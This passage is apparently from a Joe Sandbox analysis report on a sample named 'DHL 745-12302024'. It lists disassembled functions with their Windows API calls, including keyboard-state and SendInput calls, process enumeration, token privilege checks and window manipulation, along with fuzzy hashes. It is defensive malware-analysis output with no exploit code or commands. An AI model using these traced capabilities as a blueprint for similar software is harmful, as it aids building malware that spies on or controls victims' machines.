Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: da0ec6cec4abd5f74d9f38d2eb0f3b97c5e9606d3a620864f2facee6f2e22efb
Instruction ID: 95d0c7fba1dde2e6d1368b1d4eac4a822123279f43d57f825d310280ca043c88
Opcode Fuzzy Hash: da0ec6cec4abd5f74d9f38d2eb0f3b97c5e9606d3a620864f2facee6f2e22efb
Instruction Fuzzy Hash: DA414E35610610DFCB11EF55C644A5EBBF2EF89724B198889E84BAB362CB30FD41DB91

Function 00A9D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00A86D71,00000000,00000000,00A882D9,?,00A882D9,?,00000001,00A86D71,8BE85006,00000001,00A882D9,00A882D9), ref: 00A9D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A9D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00A9D9AB
__freea.LIBCMT ref: 00A9D9B4

Part of subcall function 00A93820: RtlAllocateHeap.NTDLL(00000000,?,00B31444,?,00A7FDF5,?,?,00A6A976,00000010,00B31440,00A613FC,?,00A613C6,?,00A61129), ref: 00A93852

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 51627846c8dfcaadb66eaa8aeb8e3b91b75932b1b28ac84bb0baea0fed90d2c6
Instruction ID: 7f169aa9d19cdafe827bd1d5bc5a0f0e5d5feb86f1cd72775d9f1823fd599128
Opcode Fuzzy Hash: 51627846c8dfcaadb66eaa8aeb8e3b91b75932b1b28ac84bb0baea0fed90d2c6
Instruction Fuzzy Hash: 0431BE72A0020AABDF24EFA5DD41EAE7BE5EB40310B054269FC04D7291EB35CDA5CB90

Function 00ACAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00ACABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 00ACAC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 00ACAC74
SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00ACACC6

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 1a097f044c373c365c86c2791e08cf240189cd466f3e274e2402bd38426637e2
Instruction ID: 8c7fc52b81beaadcfdffa8df82ec9d3f5efd60bfc55a0176ac9df3a46f2f8303
Opcode Fuzzy Hash: 1a097f044c373c365c86c2791e08cf240189cd466f3e274e2402bd38426637e2
Instruction Fuzzy Hash: 13312830A4831CAFEF34CBE98C08FFA7BB5AB65328F05421EE485921D1C37589858752

Function 00AF7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00AF769A
GetWindowRect.USER32(?,?), ref: 00AF7710
PtInRect.USER32(?,?,00AF8B89), ref: 00AF7720
MessageBeep.USER32(00000000), ref: 00AF778C

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 9e29727d6d8217f94e5ab3655cad880b5d2b2d1f125baaedb54064a2426c3a11
Instruction ID: e049042a2dbb45fc5999d5c033b9d4860e68f65804ff260961c6c5c807114ac9
Opcode Fuzzy Hash: 9e29727d6d8217f94e5ab3655cad880b5d2b2d1f125baaedb54064a2426c3a11
Instruction Fuzzy Hash: A4417834A19218DFCB01EFD9C994EBDB7F5BB49314F2941A8FA149B261C730E942CB90

Function 00AF16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00AF16EB

Part of subcall function 00AC3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AC3A57
Part of subcall function 00AC3A3D: GetCurrentThreadId.KERNEL32 ref: 00AC3A5E
Part of subcall function 00AC3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00AC25B3), ref: 00AC3A65

GetCaretPos.USER32(?), ref: 00AF16FF
ClientToScreen.USER32(00000000,?), ref: 00AF174C
GetForegroundWindow.USER32 ref: 00AF1752

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: da5c2184aad78602163c4f4a7a64aa683300d2fe8d1d3642db5cb787deb0b75d
Instruction ID: 6157f98726384b64727b97da262610744e3d666bc790c6867b67ab585cabb3a7
Opcode Fuzzy Hash: da5c2184aad78602163c4f4a7a64aa683300d2fe8d1d3642db5cb787deb0b75d
Instruction Fuzzy Hash: CE313E75D00249AFCB04EFAAC981DBEBBF9EF48314B5080AAE555E7211D6319E45CFA0

Function 00ACD4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00ACD501
Process32FirstW.KERNEL32(00000000,?), ref: 00ACD50F
Process32NextW.KERNEL32(00000000,?), ref: 00ACD52F
CloseHandle.KERNEL32(00000000), ref: 00ACD5DC

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 14a664a0eb6857a3b08663f9ef76e455a1d5a4d8bad1ff5c025a4c1d0e9b29ca
Instruction ID: 9d34dd65d6a3e6ce467bba4d65186720b6ea78cb59507cb0762a7a4cd29d981f
Opcode Fuzzy Hash: 14a664a0eb6857a3b08663f9ef76e455a1d5a4d8bad1ff5c025a4c1d0e9b29ca
Instruction Fuzzy Hash: 44317C721082049FD300EFA4C985EAFBBF8AF99354F14092DF585961A1EB719949CBA2

Function 00AF8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A79BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A79BB2

GetCursorPos.USER32(?), ref: 00AF9001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00AB7711,?,?,?,?,?), ref: 00AF9016
GetCursorPos.USER32(?), ref: 00AF905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00AB7711,?,?,?), ref: 00AF9094

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 773ba6623bdc748be4bd173f908cec7643f54275a2d127bb328d7ffe4f2743bb
Instruction ID: 11fb2b10b2ac911b33028854f44f527b622393b61d5feafd758c9c7c402ed478
Opcode Fuzzy Hash: 773ba6623bdc748be4bd173f908cec7643f54275a2d127bb328d7ffe4f2743bb
Instruction Fuzzy Hash: E921483560001CAFDB258FE9C858FFB7BB9EB89360F144165FA058B2A1CB319991DB61

Function 00ACD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00AFCB68), ref: 00ACD2FB
GetLastError.KERNEL32 ref: 00ACD30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 00ACD319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00AFCB68), ref: 00ACD376

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 2c62dce2ff47fe73f6b9dcacb8464f35b443b33274df68d0b98236edbfc5c6f1
Instruction ID: 1656cf0b29d3402f550d4029169ebe3c5483300d112c921a7997aee9f3a5c2f0
Opcode Fuzzy Hash: 2c62dce2ff47fe73f6b9dcacb8464f35b443b33274df68d0b98236edbfc5c6f1
Instruction Fuzzy Hash: 0921A3745042059FC700EF64CA819ABB7E8EE55364F114A2EF499DB3A1E730D946CB93

Function 00AC1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AC102A
Part of subcall function 00AC1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AC1036
Part of subcall function 00AC1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AC1045
Part of subcall function 00AC1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AC104C
Part of subcall function 00AC1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AC1062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00AC15BE
_memcmp.LIBVCRUNTIME ref: 00AC15E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AC1617
HeapFree.KERNEL32(00000000), ref: 00AC161E

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 2e81c98dae03bc3c930d138f342473e7812e1777877add05df58eaba4ea55a26
Instruction ID: a5157841060f2adf615e929d44e2f6caeec91ce02d37e232b7b6290b8483ef7f
Opcode Fuzzy Hash: 2e81c98dae03bc3c930d138f342473e7812e1777877add05df58eaba4ea55a26
Instruction Fuzzy Hash: CD219A71E00108EFDF00DFA5CA45FEEB7B8EF46354F1A4459E441AB242E730AA05DBA0

Function 00AF2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00AF280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AF2824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AF2832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00AF2840

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: ce5c6d9b53a2efeab1295c8e26f2dfd29bcab4d329de5e7392f377b03043a0c8
Instruction ID: 7d17ade289fe99185dfda28be14f448fe628f528b49a9aafad85f6a2596372b4
Opcode Fuzzy Hash: ce5c6d9b53a2efeab1295c8e26f2dfd29bcab4d329de5e7392f377b03043a0c8
Instruction Fuzzy Hash: 1321B031205519AFD714EBA4C944FBA7BA5AF45324F148158F5268B6E2C771EC82C7D0

Function 00AC78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00AC790A,?,000000FF,?,00AC8754,00000000,?,0000001C,?,?), ref: 00AC8D8C
Part of subcall function 00AC8D7D: lstrcpyW.KERNEL32(00000000,?,?,00AC790A,?,000000FF,?,00AC8754,00000000,?,0000001C,?,?,00000000), ref: 00AC8DB2
Part of subcall function 00AC8D7D: lstrcmpiW.KERNEL32(00000000,?,00AC790A,?,000000FF,?,00AC8754,00000000,?,0000001C,?,?), ref: 00AC8DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00AC8754,00000000,?,0000001C,?,?,00000000), ref: 00AC7923
lstrcpyW.KERNEL32(00000000,?,?,00AC8754,00000000,?,0000001C,?,?,00000000), ref: 00AC7949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00AC8754,00000000,?,0000001C,?,?,00000000), ref: 00AC7984

Strings

cdecl, xrefs: 00AC797B

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 244ebbe4f4687406ece4d58d3616325f1f4b464b036076e9de882dca3f3d3257
Instruction ID: 4ad58bc4047e9365235e3c157e7ecbc0a25ec2c236eecfe90a5702c013011d08
Opcode Fuzzy Hash: 244ebbe4f4687406ece4d58d3616325f1f4b464b036076e9de882dca3f3d3257
Instruction Fuzzy Hash: 4B11D63A200205AFCB159F75DC45E7A77E5FF45360B51802EF946C7264EB319911CB61

Function 00AF7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00AF7D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00AF7D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00AF7D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00ADB7AD,00000000), ref: 00AF7D6B

Part of subcall function 00A79BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A79BB2

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 34d4921a7fe04fec5dd90c8c4903ecc6502eebabb458ce252c5e5d59f5823d4d
Instruction ID: d1d3d76d7de9c3962fb1d6092ed643e8cfeb20dc64cede4afba7d812ef8ef53a
Opcode Fuzzy Hash: 34d4921a7fe04fec5dd90c8c4903ecc6502eebabb458ce252c5e5d59f5823d4d
Instruction Fuzzy Hash: 0F11A231504619AFCB109FA9CC04ABA3BA9AF453B0B658724F939C72F0D7309952CB50

Function 00AC1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00AC1A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AC1A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AC1A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AC1A8A

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 757906eea828f1f69f9cfc41e3a6fc399f3c688c6f2288316d63836caf8a9696
Instruction ID: 13dd92b6f3eb4b479fbf7090c9556c884da8fb0e66840736960433f0f10c1fd5
Opcode Fuzzy Hash: 757906eea828f1f69f9cfc41e3a6fc399f3c688c6f2288316d63836caf8a9696
Instruction Fuzzy Hash: D811393AE01219FFEB10DBA5CD85FADBB78EB08750F210095EA00B7290D6716E50DB94

Function 00ACE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00ACE1FD
MessageBoxW.USER32(?,?,?,?), ref: 00ACE230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00ACE246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00ACE24D

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: b926de8db134c21fec1e25cc731bed11f1620b94bf7984f0d2676faed3b4e7cb
Instruction ID: 929432cb1f5c9e719011b269d47843b52c6a4f0fdd86d12467481ae8d1c042ff
Opcode Fuzzy Hash: b926de8db134c21fec1e25cc731bed11f1620b94bf7984f0d2676faed3b4e7cb
Instruction Fuzzy Hash: A511C476904258BBCB01DFED9D09FEE7FACEB45320F154659F924E3291D7B0890487A4

Function 00A8D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00A8CFF9,00000000,00000004,00000000), ref: 00A8D218
GetLastError.KERNEL32 ref: 00A8D224
__dosmaperr.LIBCMT ref: 00A8D22B
ResumeThread.KERNEL32(00000000), ref: 00A8D249

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: bb5914b5917268d0ccc9b8b7b1d8e17a6d7c9152d228d9a13801c888cb6c52e9
Instruction ID: 43ad4789b936f56d6469897e2ff3a2e89365e69e686c06c8e3dbbce0e874d51e
Opcode Fuzzy Hash: bb5914b5917268d0ccc9b8b7b1d8e17a6d7c9152d228d9a13801c888cb6c52e9
Instruction Fuzzy Hash: C1019236805209BBDB11BBE6DC09BEE7B69EF81771F104319F925961E0EB718911C7A0

Function 00A83B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00A83B56

Part of subcall function 00A83AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00A83AD2
Part of subcall function 00A83AA3: ___AdjustPointer.LIBCMT ref: 00A83AED

_UnwindNestedFrames.LIBCMT ref: 00A83B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00A83B7C
CallCatchBlock.LIBVCRUNTIME ref: 00A83BA4

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 488055da5aded65928cba4c99591588721a73ec2a2fd290d181228f43f1dd3af
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 5701D772100149BBDF126F95CD46EEB7B69EF58B54F044014FE4856121D632E9619BA0

Function 00A93073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00A613C6,00000000,00000000,?,00A9301A,00A613C6,00000000,00000000,00000000,?,00A9328B,00000006,FlsSetValue), ref: 00A930A5
GetLastError.KERNEL32(?,00A9301A,00A613C6,00000000,00000000,00000000,?,00A9328B,00000006,FlsSetValue,00B02290,FlsSetValue,00000000,00000364,?,00A92E46), ref: 00A930B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A9301A,00A613C6,00000000,00000000,00000000,?,00A9328B,00000006,FlsSetValue,00B02290,FlsSetValue,00000000), ref: 00A930BF

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
